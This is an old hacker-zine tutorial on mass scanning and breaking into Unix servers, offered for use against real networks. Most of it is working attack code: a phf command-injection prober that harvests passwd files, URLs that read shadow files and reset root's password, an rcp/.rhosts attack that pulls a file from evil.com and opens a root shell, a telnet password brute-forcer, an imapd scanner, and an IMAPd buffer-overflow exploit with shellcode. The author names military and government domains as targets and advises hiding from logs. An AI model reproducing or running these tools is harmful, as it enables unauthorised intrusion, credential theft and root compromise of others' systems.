Modern Tecnics or the axing of today:
- uid (0) responses - All other phf query responses - Read message files - Mass login attempts using finger and shadowed passwd files - Using test-cgi to list directories Introduction Like Bob Dylan said .."the times there are A changin"…in fact the tecnic is no longer patience and luck ..if you are a Oldie you remember the nights you lost trying to brute force servers sending passwords to the terminal and hoping for a prompt. This article is about mass scans probes and mass brute force stuffs…some tecnics are old ..but still some works ok and combined with some new tecnics all you have to do is put the process running on a 24 hours shell…go party all night and when you came back you have plenty of stuff to choose from. Let the processor work for you and not your body work for the processor Disclaimer I don’t give a damn if you phuck thing up cause im not responsible for what you do ..i’m just here to teach you some tecnics..after that its you own responsibility…be wise and be careful…the guys on the other side are so smart as you..and even the Best Die like the Rest. Grabing some huge server lists Use this shell script to scan for servers in domains and subnets you choose scanip.sh --------------------------------------------Cut here----------------------------------------------------- #!/bin/bash # make lists of ips from subnets # Based on tnt imapd scanner code # Adapted by D00M, Master of Perversion # use it with sh scanip.sh <domain> or chmod +x scanip.sh if [ $# != 1 ] then echo "Usage:" echo `basename $0`" <domain>" exit else echo "* Scanning domain for hosts." host -l $1 | grep "has address" | awk -F ' ' '{ print $4 }' > $1.domains echo "* Host scan complete." echo "* Sorting hosts and removing dupes." sort < $1.domains > $1.sorted uniq < $1.sorted > $1.domains rm -f $1.sorted fi --------------------------------------------Cut here----------------------------------------------------- Do a chmod +x scanip.sh or run it with sh scanip.sh <domain> to get a list of ips to scan for instance do sh scanip.sh mil.id and you have all register military servers in Indonesia Mass phf scan Some people say phf is lamme and old…I cant agree with that..cause if used in a case the odds are small but if used in a range of cases the result is great and the potential is huge As an example…I scanned a huge list of servers in my home country ..almost all the registed internal primary domains and I’ve got some satisfactory results…servers running http deamons as uid(0) (are you aware of the potentiality) and lots and lots of passwd files Ok..now for the probe…what you need to run the sucker 1. Perl in the path 2. Lynx in the path 3. 256 char filenames ie: (unix or os/2 hpfs) 4. The source code provided here 5. A list of Urls..for instance use the one in the Indonesian net exposed article or scan yourself using the shell script above (scanip.sh) The probe works like this…it reads each of the urls in the url file, opens a lynx section with a phf query asking the deamon the id he runs on…if the uid is 0 he stores the result in a specific file and grab the passwd file in a file url.passwd…if the uid is other he grabs the passwd file..if no response is given he carry on to the following url The code follows like this: geturl.pl --------------------------------------------Cut here----------------------------------------------------- #!/usr/bin/perl # # geturl by Nfin8 / Invisible Evil / D00M Master of Perversion # #The original code is from Nfin8 and Invisible Evil…I just changed some stuff in the output #in order to have more explicit output results # # Format of http://website.dom/cgi-bin/phf?Qalias=x%0a/usr/bin/id # Format of http://website.dom/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd # IF result of first command returns an "id=" then check for user. If user # is not root then execute the 2nd form. # Assign null list to @URLs which will be added to later. my(@URLs)=(); my($program) = "lynx -dump"; # Pull off filename from commandline. If it isn't defined, then assign default. my($URLfilename) = shift; $URLfilename = "urls" if !defined($URLfilename); # Do checking on input. die("GetURL: $URLfilename is a directory.\n") if (-d $URLfilename); # Open and read contents of URL file into @URL by line. open(FILE, $URLfilename) or die("GetURL: Cannot open $URLfilename for input.\n"); @URLs = <FILE>; close(FILE); # Open output file. open(OUTFILE, ">>GetURLResults") or die("GetURL: Cannot open output file.\n"); open(ROOTFILE, ">>RootURLResults") or die("RootURL: Cannot open root file.\n"); my($url)=""; foreach $url (@URLs) { print ("Now checking: $url"); chomp($url); $result = `$program http://${url}/cgi-bin/phf?Qalias=x%0a/usr/bin/id`; print OUTFILE ("\n============ $url ============\n"); foreach (split(/\n/, $result)) { print OUTFILE ("$_\n"); } if ($result =~ m/id=/i) { if ($result =~ m/root/i) { print ("Logging root response.\n"); print ROOTFILE ("\n============ $url ============\n"); foreach (split(/\n/, $result)) { print ROOTFILE ("$_\n"); $result = `$program http://${url}/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd`; # Output results to file named <domain>.passwd; print ("Getting /etc/passwd.\n"); local($domainfilename)=""; $domainfilename = $url; if (open(PASSWDFILE, ">${domainfilename}.passwd")) { print PASSWDFILE ("\n"); foreach (split(/\n/, $result)) { print PASSWDFILE ("$_\n"); } close(PASSWDFILE); print ("Done! [$domainfilename].\n"); } else { print ("FAILED! [$domainfilename].\n"); } } } else { print ("Got ID response.\n"); $result = `$program http://${url}/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd`; # Output results to file named <domain>.passwd; print ("Getting /etc/passwd.\n"); local($domainfilename)=""; $domainfilename = $url; if (open(PASSWDFILE, ">${domainfilename}.passwd")) { print PASSWDFILE ("\n"); foreach (split(/\n/, $result)) { print PASSWDFILE ("$_\n"); } close(PASSWDFILE); print ("Done! [$domainfilename].\n"); } else { print ("FAILED! [$domainfilename].\n"); } } } } # We are done. Close the output file and end the program. close (OUTFILE); close (ROOTFILE); 0; --------------------------------------------Cut here----------------------------------------------------- Using the probe is so simple as that..cut and paste it in a unix shell…chmod +x on the file and run it like geturl <url-list> A little advice for the masses…phf querys in some cases make logs of your presence ..so if you wanna do this mass thing use other than your own sistem..*Grin* After that you should get three type of outputs: 1. GeturlResults…the file that stores ALL the responses from the servers…you dont need this..its only there so that you can verify the servers that by that time were down and didn’t answer to your request…you can try them latter 2. RootURLResults..the file that stores all the urls that respond to your id query with uid(0)..(not so many as you can suppose …I got 3 in my home country scan) 3. Some files with the following format url.passwd..each of this files is the /etc/passwd file of the specific url Now that the scan is done lets get to work - uid (0) responses If you got some uid 0 responses it means all queries sent to the server have root permissions If you know some unix commands use them to get a shell prompt ..im not here to teach you that..but heres some nice things to do first learn the phf query format…its like this http://www.victim.com/cgi-bin/phf?Qalias=x%0a after that put the unix command you like…phf queries doesn’t understand space character ..so use %20 instead ..here some examples of what you can do List root directory http://www.victim.com/cgi-bin/phf?Qalias=x%0als%20-alg%20/root Get inside as root First backup passwd file http://www.victim.com/cgi-bin/phf?Qalias=x%0acp%20/etc/passwd%20/etc/passwd.my Then change root’s passwd to nopasswd (if the server lets you) http://www.victim.com/cgi-bin/phf?Qalias=x%0apasswd%20root Then telnet to the victim.com…login as root and do what you need to grab root..but dont forget once inside to do a mv passwd.my passwd Grab shadow passwd (do some ls cause shadow can be anywhere ..here some default stuff) On BSDi and FreeBSD http://www.victim.com/cgi-bin/phf?Qalias=x%0acat%20/etc/master.passwd On Linux boxes http://www.victim.com/cgi-bin/phf?Qalias=x%0acat%20/etc/shadow On AIX http://www.victim.com/cgi-bin/phf?Qalias=x%0acat%20/etc/security/passwd Well..the potential are enormous..I wont go any further - All other phf query responses Well in almost cases what you get as response is the passwd file..some are plain passwd files and some are shadowed …the shadowed ones I will talk latter ..the plain passwd file use for instance john to crack some accounts and once inside read some stuffs on exploits and other tecnics to grab root If you got some uid answers 65535 user nobody, root privileges can be obtained by exploiting a problem with /usr/bin/rcp. Many applications are running as ‘nobody’, in particular the NCSA httpd server, which by default executes all cgi-bin scripts under this uid. This exploits was tested on Linux Red Hat 4.0 and Linux Slackware 3.1. You need a shell account on a unix box and netcat installed… nc is a very important axing tool. I included the zipped file in this zine, put the file in your shell and then gzip -d <file> , tar -xvf <file> and finally do a make to the system your using The exploit works as follows: $ echo "+ +" > /tmp/my.rhosts $ echo "GET /cgi-bin/phf?Qalias=x%0arcp+hacker@evil.com:/tmp/my.rhosts+ /root/.rhosts" | nc -v - 20 victim.com 80 $ rsh -l root victim.com "/bin/sh -i" # What it does is create a temporary rhost file on your system ..rcp it to the victim.com root directory as the new .rhosts file…and then calls a remote shell with root permission using rsh…if it works a # on the victims server will be gained ..otherwise a "no permission" message will appear Brute force login This section is some tecnics on getting inside the system by brute forcing a login prompt using some of the outputs of the last section, and some new or not so new vulnerabilities - Read message files On most systems all connections are recorded in files called message ..sometimes when you do a telnet to a sistem you do it so fast or the sistem is so slow that instead of typing your login when asked you type your passwd..if you can read this files remotely…and in most cases you can…here’s a vulnerability we can use..lets see how: First lets see the Login Error messages Do this on your browser http://www.victim.com/cgi-bin/phf?Qalias=x%0acat%20/var/log/message you’ll get a print of a big file on your screen…now browse it and look for "LOGIN FAILURE" messages…when you find one write the login that was typed..do this to the all file and dont forget to do a http://www.victim.com/cgi-bin/phf?Qalias=x%0als%20-alg%20/var/log to list the all dir and see if there’s more messages files ..cause the older messages files are backed up to messages.0 and so on When you finished you should have a list of words to use on john or your custom cracker ..crack the passwd files you got bellow and with luck some of the login failures are passwd…even root’s passwd could be there If the system is shadows but still you can read the message files you can try brute force login with the LOGIN FAILURE words you got…look in the timestamps …if a user gets a LOGIN FAILURE and then logins as "mrX" maybe…maybe..the erroneous login could be "mrX" passwd…its a question of persistence and luck…but still…it works fine most of the time - Mass login attempts using finger and shadowed passwd files Some other possibility to break in the system is use a mass probe to try lots of logins passwds till it finds a valid account on the system. You can use the info you want but I advice you to get the most info you can on the system ..cause in a system with lots of user accounts many tend to use as passwd the login or parts of his real name. In this section we can use the shadowed passwd files that you caught with our probe ..the other way is..if the system has finger open do mass fingers to the system and with the info we get try it as passwd.. you only use finger when we dont have info on the user list inside the server To use this probe you need a script language called expect…use the file
ex-512.zip included here and then follow the instructions on the installation readme file..its simple..but by default the archive is prepared to unzip on /usr/bin and /usr/lib..if you dont have root in your system you have to change the header on the script and put the exact location of the binary Other thing I advice you to change if you’re using the probe to do mass fingers is the finger names ..put on some common user names of the country you’re scanning ..cause by default it uses English names If you are using the shadowed passwd files that you got with the geturl script don’t do nothing cause the finger part is skipped the code follows like this: login.exp --------------------------------------------Cut here----------------------------------------------------- #!/usr/bin/expect -- set host [lindex $argv 0] ;# host is taken from the command line set account [lindex $argv 1] ;# ditto the account name set pw [lrange $argv 2 end] ;# the rest are potential passwords set timeout 60 foreach password $pw { puts "\n\nExpect: using $account $password -----------------------------" spawn telnet $host expect "ogin:" send "$account\r" expect "assword:" send "$password\r" expect { # we look for the "Last login" message or shell prompts "ast login" { puts "LOGGED INTO $host $account $password" send "exit\r"; } "#$" { puts "LOGGED INTO $host $account $password" send "exit\r"; } "%$" { puts "LOGGED INTO $host $account $password" send "exit\r"; } "\$$" { puts "LOGGED INTO $host $account $password" send "exit\r"; } # otherwise bail out "incorrect" close "invalid" close } } exit --------------------------------------------Cut here----------------------------------------------------- mf.pl --------------------------------------------Cut here----------------------------------------------------- #!/usr/bin/perl # 'middlefinger' # Finger a remote host, collect accounts and names. # or use provided passwd file # Use that data to attempt to login. $max = 15; $host = $passwdfile = $debug = $pwlist = 0; &parser(); # parse command line die "Usage: mf.pl [-h<remote host>] [-f<passwdfile>] [-l<password list>] [-d]\n" unless $host; &banner(); # Names to finger. This can obviously be expanded. @names = qw/mike steve michael mark tim susan cheryl laura john william bill jill sue chris adam kathy cathy rebecca joseph joe frank tracy tammy christopher alan edward shelly emily carrie terry carol caroline paul brian tom thomas heather becky barbara barb todd ron ronald david sharon harold frank benjamin jean gene lisa lee anthony/; # Collect account data if ($passwdfile) { open FILE, "$passwdfile" or die "Can't open $passwdfile: $!\n"; @accountdata = <FILE>; close FILE; &refine_passwdfile_data(); } else { # finger the remote for info foreach $name (@names) { print "Trying $name...\n" if $debug; open PIPE, "finger -l $name\@$host|" or die "No finger $name\@$host: $!\n"; @accountdata = (@accountdata, <PIPE>); close PIPE; } print "Refining finger data\n" if $debug; &refine_finger_data(); } # Break the list of accounts into smaller arrays, set by the # variable $max. We want to run a certain number of simultaneous # shells, but we don't want to max out the ports on the other end # or hose the connection too bad. @keys = sort keys %hash; $index = int($#keys / $max); # for stepping through the array @keys for ('0' .. $index) { @buffer = splice(@keys, 0, $max); # print "buffer: @buffer \nlength: $#keys\n"; &try_to_login(@buffer); } print "\nDone. Exiting...\n"; ### ### Subroutines ### # Attempt to login with each account sub try_to_login { my $account = shift; return unless $account; $level++; my $pipe = "PIPE$level"; open $pipe, "login.exp $host $account @{$hash{$account}}|" or warn "No pipe to telnet: $!\n"; &try_to_login(@_); # recurse print "\n=====================================================\n"; print "Trying ACCOUNT: $account PASSWORDS: @{$hash{$account}}\n"; my @lines = <$pipe>; close $pipe; print "@lines"; print "\n=====\n"; } # filter out potential nonpasswords sub pw_filter { my %pws; my (@list) = @_; print "List: @list\n" if $debug; if ($passwdfile) { for (@list) { unless (length($_) < 5) { s/[()']//g; $pws{$_}++; if (length($_) == 5) { $pws{"${_}1"} = "${_}1"; } } } } else { # process finger data for (@list) { unless ($_ =~ /login|login:|name:|name|in|real|life/i || length($_) < 5) { s/[()']//g; $pws{$_}++; if (length($_) == 5) { $pws{"${_}1"} = "${_}1"; } } } } print "returning ", join(' ', keys %pws), "\n" if $debug; return keys %pws; } # parse the command line sub parser { for (@ARGV) { /^-h/ && do { $host = $'; next; }; /^-f/ && do { $passwdfile = $'; next; }; /^-d/ && do { $debug = 1; next; }; /^-l/ && do { $pwlist = $'; next; }; } } # Refine finger data sub refine_finger_data { @logins = grep /Login/, @accountdata; chomp @logins; # Dumb kludge. "@logins = grep /[^?]$/, @logins;" doesn't work. for (@logins) { /.$/; if ($& eq '?') { undef $_; } } print "filtered logins:\n", join("\n", @logins); $results = @logins; die "Insufficient account data\n" unless $results; # Store login data into data structure for (@logins) { tr/[A-Z]/[a-z]/; s/(\s)+/ /g; print "\n\nDespaced: $_\n" if $debug; @a = split(/ /); print "pw_filter: ", join(' ', &pw_filter(@a)), "\n" if $debug; # toggle this depending on finger's output $login = $a[2]; # <----- TOGGLE! $hash{$login} = [ &pw_filter(@a) ]; print "Data: account-> $login, pws-> @{$hash{$login}}\n\n" if $debug; } } sub refine_passwdfile_data { for (@accountdata) { @fields = split(/:/); @namedata = split(/,/, $fields[4]); print "pwdata: $fields[0] $namedata[0]\n" if $debug; $login = $fields[0]; $namedata[0] =~ tr/A-Z/a-z/; @a = split(/ /, $namedata[0]); print "pw_filter: ", join(' ', &pw_filter(@a)), "\n" if $debug; $hash{$login} = [ &pw_filter($login, @a) ]; print "Data: account-> $login, pws-> @{$hash{$login}}\n\n" if $debug; } } sub banner { print << "EOLN"; Middle Finger Copyleft (C)1997 Americrack Inc. "Your Link to Illegal Communications" EOLN } --------------------------------------------Cut here----------------------------------------------------- To use the probe just cut and past the login.exp part and put it in your shell…then cut and past mf.pl and chmod +x on the script ..login.exp subroutine is called inside mf.pl so dont use other name than that to use it on a shadowed passwd file do mf.pl -hvictim.com -fshadowfile -lpasswdlistname -d..if the shadowed file exist the probe creates a passwdlist and then do a mass telnet using the list..else if dont it starts fingering the machine in order to create the passwd list and finally do the mass telnet stuff If everything is done well you should now have a valid account on the system and you’re ready to axe the mothaphucker..*Grin* - Using test-cgi to list directories If the machine doesnt have phf…doesnt have finger port open..well…bad luck..you cant use none of the above..so try other approach ..this is one of the possibilities ..test-cgi Basically test-cgi is a cgi-bin query script that if working on a server can be used to list directories ..whats the point of listing directories? ..well..try listing /home dir and you get all the users on the system..after that try your luck doing brute force, login equal to passwd..in most cases you get at least an account inside the vulnerability works like this, first test if cgi-bin is there doing machine% echo "GET /cgi-bin/test-cgi?/*" | nc www.victim.com 80 And if so you’ll get a output on your browser similar to this: CGI/1.0 test script report: argc is 1. argv is /\*. SERVER_SOFTWARE = NCSA/1.4.1 SERVER_NAME = www.victim.com GATEWAY_INTERFACE = CGI/1.1 SERVER_PROTOCOL = HTTP/0.9 SERVER_PORT = 80 REQUEST_METHOD = GET HTTP_ACCEPT = PATH_INFO = PATH_TRANSLATED = SCRIPT_NAME = /bin/cgi-bin/test-cgi QUERY_STRING = /a /bin /boot /bsd /cdrom /dev /etc /home /lib /mnt /root /sbin /stand /sys /tmp /usr /usr2 /var REMOTE_HOST = remote.machine.com REMOTE_ADDR = 255.255.255.255 REMOTE_USER = AUTH_TYPE = CONTENT_TYPE = CONTENT_LENGTH = then to browse the /home dir do machine% echo "GET /cgi-bin/test-cgi?/home/*" | nc www.victim.com 80 and voila..you get a output like this and lots of logins to test CGI/1.0 test script report: argc is 1. argv is /\*. SERVER_SOFTWARE = NCSA/1.4.1 SERVER_NAME = www.victim.com GATEWAY_INTERFACE = CGI/1.1 SERVER_PROTOCOL = HTTP/0.9 SERVER_PORT = 80 REQUEST_METHOD = GET HTTP_ACCEPT = PATH_INFO = PATH_TRANSLATED = SCRIPT_NAME = /bin/cgi-bin/test-cgi QUERY_STRING = /ze /manel /pedro /antonio /maria /joana /manuela /francisco /toze /paco /nassa REMOTE_HOST = remote.machine.com REMOTE_ADDR = 255.255.255.255 REMOTE_USER = AUTH_TYPE = CONTENT_TYPE = CONTENT_LENGTH = For now you have to do this test one by one..but if you know a bit of perl you can modify the mf.pl script to do mass test-cgi…just add a line to the script doing the test-cgi home dir capture ..then change the lines where it works the finger info to create the passwdlist…you just need to put there the format sent by the test-cgi query…its not difficult ..and if I have time I’ll do that and post it in the next number Remote Stuff using info from Mass scans To finish this article here is another way to get in..this time without any brute force login or passwd crack..if you get in this way..root owns you..*Grin* I will talk only about remote imapd buffer overflow exploit…but there’s more..just imapd cause the idea is not the remote itself but the source code to scan for 143 port open servers (imapd) The other pop3 and ncsa remote are very similar in how to use..the only difference is the port you put in the command line..110 for pop3 and 80 for ncsa and the offsets to look for..but still both are old exploits and recent versions are patched. The other remote is samba…its recent and works fine..in future editions I suppose someone will say something about the code follows like this: imapdscan.c ------------------------------------------Cut here----------------------------------------------------- /*******************************************************************/ /* ADM imapd scanner the BEST of §THE WORLD ! Make by DA ADM crew */ /* he needs the output of a host -l target >filez for run */ /* USAGE is SIMPLE ! ADMimap <host filz> <your ipZ> <delay> */ /*******************************************************************/ /* VERSION: 1.1 */ /* CoDeuRz: a CoDeuRz of ADM */ /* Greeeetzzzzzz: ADM & HeiKe & some guyz on ***.*******.*** */ /*******************************************************************/ #include <stdio.h> #include <signal.h> #include <netdb.h> #include <sys/types.h> #include <sys/socket.h> #include <sys/ioctl.h> #include <netinet/ip.h> #include <netinet/ip_icmp.h> #include <netinet/in.h> #include "../../includes/ADM-spoof.c" #include "../../includes/pres.c" host2ip(char *serv) { struct sockaddr_in sinn; struct hostent *hent; hent=gethostbyname(serv); if(hent == NULL) return 0; bzero((char *)&sinn, sizeof(sinn)); bcopy(hent->h_addr, (char *)&sinn.sin_addr, hent->h_length); return sinn.sin_addr.s_addr; } int raw_send,raw_tcp; main(int argc, char **argv) { struct sockaddr_in recv_dst; unsigned long da_ip; char buffer[4096],reply[256]; char buffer2[20]; int on=1,off=0,verbose=1,goout=0,goin=0,timez2=0,autotime=0,regular=10; int i=0,j,resu,n,len,auto3,timez=8,max_try=2; FILE *log; FILE *IPSRC; FILE *HOSTF; pid_t pid; unsigned long int nip; struct iphdr *ip=(struct iphdr*)buffer; struct tcphdr *tcp=(struct tcphdr*)(buffer+IPHDRSIZE); HOSTF=fopen(argv[2],"r"); IPSRC=fopen("IPSRC","w+"); IPFILEZ(HOSTF,IPSRC); fclose(HOSTF); rewind(IPSRC); pres(); printf("ADMimap ver 1.1 (c) ADM\n"); if(argc<4){ printf("\nusage: ADMimap <yourIP> <IP file> <delay>\n"); printf("\n<yourIP> = ADMimap needs your IP for make the scan\nbut u can scan with www.nasa.gov if u want ;))\n"); printf("<IP file> = the filez of ip u want scan\ntry a :# host -l nasa.gov > ipfilez for scan ALL nasa.gov\n"); printf("<delay> = define the delay in second for waiting the ACK type 0 for auto\n"); exit(0); } log=fopen("imapdlog","w"); if (log==NULL) { perror("fopen"); exit(1); } raw_send=socket(AF_INET, SOCK_RAW, 255); if(raw_send == -1) { printf("cant open raw socket for sending\n"); exit(1); } raw_tcp=socket(AF_INET ,SOCK_RAW ,6); if (raw_tcp == -1) { printf("can't open raw socket for receiving\n"); exit(1); } ioctl(raw_tcp,FIONBIO,&on); if(timez2=atoi(argv[3]) == 0) { auto3 = 1; printf(" AUTO ON ! \n"); } else{timez2=atoi(argv[3])*50;} for(;;){ if(!feof(IPSRC)){ fscanf(IPSRC,"%s",buffer2); printf(" sendto %s\n",buffer2); autotime++; send_pkt(raw_send,host2ip(argv[1]),host2ip(buffer2), 2666,143,TH_SYN,111,111,0,NULL,0); } if(feof(IPSRC))goout=3; if(goout>1){ usleep(1); goin++; } if(auto3==1){ if(goin > autotime*regular ) { fclose(log); exit (0); } } else{ if(goin > timez2){ fclose(log); exit(0);} } buffer[0]='0'; get_pkt(raw_tcp,buffer,400); if(buffer[0]!='0'){ if(tcp->th_dport == htons(2666)){ if(tcp->th_sport == htons(143)){ resu= (tcp->th_flags | TH_ACK) ; if(resu==18) { fprintf(log,"imapd on %s\n",inet_ntoa(ip->saddr)); fflush(log); } } } } } fclose(log); } --------------------------------------------Cut here----------------------------------------------------- Cut and paste the C code into a shell…then compile with cc -o imapdscan imapdscan.c To use the probe you need a list of servers to scan..use the scanip.sh shell script to scan subnets for servers and use the output file in the probe Now that you have a servers list and the probe compiled lets scan for open imapd in each one type imapdscan <your ip> <ip list> 0 and the probe starts scanning ..you can do a ctrl-z to suspend it and use command bg to put it on background ..drink some beers and wait till it finish checking You should get a output file called imapdlog..there you got all the server with imapd service open Now lets check if the sucker is vulnerable to the remote imapd exploit… Cut the following source code and compile it in a shell using cc -o imapd imapd.c imapd.c --------------------------------------------Cut here----------------------------------------------------- /* * IMAPd Linux/intel remote xploit by savage@apostols.org 1997-April-05 * * Special THANKS to: b0fh,|r00t,eepr0m,moxx,Fr4wd,Kore and the rest of ToXyn !!! * * usage: * $ (imap 0; cat) | nc victim 143 * | * +--> usually from -100 to 100 */ #include <stdio.h> char shell[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\xeb\x3b\x5e\x89\x76\x08\x31\xed\x31\xc9\x31\xc0\x88" "\x6e\x07\x89\x6e\x0c\xb0\x0b\x89\xf3\x8d\x6e\x08\x89\xe9\x8d\x6e" "\x0c\x89\xea\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\xe8\xc0\xff\xff\xff/bin/sh"; char username[1024+255]; void main(int argc, char *argv[]) { int i,a; long val; if(argc>1) a=atoi(argv[1]); else a=0; strcpy(username,shell); for(i=strlen(username);i<sizeof(username);i++) username[i]=0x90; /* NOP */ val = 0xbffff501 + a; for(i=1024;i<strlen(username)-4;i+=4) { username[i+0] = val & 0x000000ff; username[i+1] = (val & 0x0000ff00) >> 8; username[i+2] = (val & 0x00ff0000) >> 16; username[i+3] = (val & 0xff000000) >> 24; } username[ sizeof(username)-1 ] = 0; printf("%d LOGIN \"%s\" pass\n", sizeof(shell), username); } --------------------------------------------Cut here----------------------------------------------------- Then use the following shell script to test each of the domains in your imaplog file imapd-exp.sh --------------------------------------------Cut here----------------------------------------------------- #!/bin/sh #Top offsets, by b0fh: 0,40,30,10,-10,100,200 if [ $# -eq '1' ]; then echo "using offset 0" ( imapd 0; while /bin/true; do read L; echo $L;done) | nc $1 143 else if [ $# -eq '2' ]; then echo "using offset $2" ( imapd $2; while /bin/true; do read L; echo $L;done) | nc $1 143 else echo "Usage: $0 <host> [<offset>]" fi fi --------------------------------------------Cut here----------------------------------------------------- Don’t forget that the imapd exploit only works for linux/intel machines…so the best thing to do is telnet for each of the ips in the imapdlog file and see what system the machine is running Lets now see two examples ..run the shell script called imap-exp.sh like this machine% imapd-exp.sh victim.com This will try the offset 0 on the victim.com machine…and a message like this should appear Trying offser 0 imapd response from the machine with the telnet client local echo option on write /bin/bash -i if the machine is not exploitable an error message should appear saying you have typed an invalid command and asking you to authenticate If not and the offset 0 was the one you should get a root bash on your screen…something like this # if nothing happens and no error message is given then try some more offsets..use the ones given in the shell script (40,30,10,-10,100,200)…and if none is good then keep trying cause you own root there I scanned Imapd on some primary domains and the results were great ..lots of servers still not patched, only the 4.2 RedHat was released with the bug fixed and older kernels on RedHat distributions, like the 4.0 and the 4.1 were vulnerable to the exploit. My success in slackware wasn’t so great..but still some 2.0.27 were caught. I’m preparing a perl script to grab the imapdlog file and choose the ones valid to the bug (Linux kernels) and in a future release I will distribute it Well…that’s all for today…theres much more mass stuff around there…but for now this should do All the source code here is taken from someone else mind..and all the authors names were respected Thanks to Kore, the GFX Guru for the D00M logo Greeting fellows of the "art" I’m D00M, Master of Perversion Mail d00mster@usa.net Visit: PtNeet channels #hackers and #hackers_hideout Darknet channel #hack D00M Over and Out
------------------------------------------------------
by D00M